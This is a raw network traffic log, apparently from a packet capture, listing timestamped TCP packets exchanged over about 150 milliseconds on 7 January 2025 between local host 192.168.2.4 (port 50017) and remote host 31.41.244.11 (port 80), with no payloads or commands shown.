Jan 7, 2025 10:09:06.193564892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.193595886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227365971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227385998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227399111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227415085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227427006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227437973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227449894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227466106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227466106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227514982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227526903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227530003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227539062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227551937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227562904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227580070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227585077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227585077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227592945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227606058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227608919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227657080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227675915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227782965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227811098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227822065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227832079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227845907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227855921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227859020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227870941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227889061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227900982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227905035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227905035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227915049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227921963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.227922916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227951050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.227972031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228028059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228044987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228056908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228069067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228075981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228086948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228095055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228100061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228113890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228126049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228126049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228167057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228190899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228245974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228256941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228267908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228301048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228312016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228336096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228368044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228379965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228383064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228393078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228413105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228466034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228478909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228491068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228497982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228508949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228514910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228514910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228539944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228576899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228583097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228595018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228605986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228626013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228657961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228657961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228662968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228674889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228682041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228707075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228718996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228728056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228734970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228745937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228771925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228811979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228873968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228885889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228909016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228919983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228929043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228933096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228945017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228945017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228956938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.228996992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.228996992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229032040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229090929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229104042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229115963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229127884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229140997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229156017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229173899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229207039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229218960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229231119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229258060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229269028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229274035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229279995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229290962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229301929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229305029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229314089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229324102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229402065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229516029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229527950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229537964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229548931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229561090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229572058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229578018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.229583979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229604006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.229629040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261060953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261092901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261104107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261142015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261149883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261183977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261198997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261209011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261213064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261241913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261253119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261254072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261308908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261308908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261341095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261353016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261363983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261377096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261394024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261415958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261421919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261434078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261434078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261483908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261483908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261603117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261615038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261637926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261648893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261668921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261679888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261692047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261696100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261713982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.261723042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261723042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261780977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.261780977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.280172110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280184984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280214071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280232906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280232906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.280244112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280268908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.280268908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.280277014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280280113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.280289888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280303001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280313969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.280333996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.280358076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.313787937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313817024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313831091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313842058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313863993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.313889980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313903093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313915014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313925028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.313925982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313942909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.313971996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313982964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.313993931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314002037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314043045 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314043045 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314049006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314060926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314071894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314078093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314112902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314132929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314157963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314168930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314204931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314207077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314218044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314229012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314240932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314244032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314260960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314332008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314378023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314389944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314399958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314410925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314421892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314456940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314491034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314491034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314505100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314522028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314532995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314543962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314554930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314563990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314563990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314568043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314583063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314591885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314593077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314626932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314626932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314631939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314644098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314654112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314659119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314671040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314672947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314682007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314698935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314727068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314744949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.314968109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314980984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.314992905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315037012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315037012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315038919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315052032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315083027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315093994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315105915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315116882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315118074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315148115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315156937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315179110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315191031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315201044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315241098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315241098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315268040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315279961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315290928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315304041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315335989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315335989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315344095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315355062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315382004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315388918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315388918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315393925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315408945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315464973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315505981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315522909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315537930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315546036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315550089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315562963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315562963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315577030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315601110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315603018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315615892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315642118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315642118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315654993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315666914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315675020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315706968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315706968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315749884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315762997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315773010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315789938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315792084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315809011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315809011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315834999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315845966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315849066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315872908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315876961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315884113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315923929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.315959930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315972090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.315989017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316000938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316025019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.316054106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.316097021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316109896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316129923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316139936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316152096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316162109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316174030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316186905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.316186905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.316200972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316211939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316217899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.316224098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.316246986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.316246986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.316306114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.347830057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.347898006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.347933054 CET	80	50017	31.41.244.11	192.168.2.4
